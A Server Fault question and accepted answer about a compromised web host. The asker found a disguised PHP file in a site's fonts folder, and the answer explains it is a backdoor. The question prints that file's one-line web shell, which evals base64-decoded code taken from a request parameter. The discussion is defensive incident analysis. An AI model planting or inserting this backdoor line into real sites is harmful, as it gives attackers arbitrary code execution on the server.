# Malicious activity on EXE:/usr/bin/php CMD:/usr/bin/php

Tags: php, lfd

> **Possible Duplicate:**
>   [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server)

Checking the lfd.log and noticed a block log for a script:

```
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php
```

It looks like the script is trying to execute /usr/bin/php but when I see the code, it is a simple one line file

```
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
```

Anyone has a similar experience and is there any way to see what is causing the /usr/bin/php invokation? The logs say that the script is being called via POST.

Answer (score 3, accepted):

Someone placed an attack script in this directory. If [`eval`](http://php.net/manual/en/function.eval.php) isn't deactivated in your PHP configuration, this will allow the attacker to execute arbitrary PHP code it sends together with the request.

The script is invoked via a simple HTTP POST request.

You should consider your system compromised  and try to find out how the attacker managed to place this script.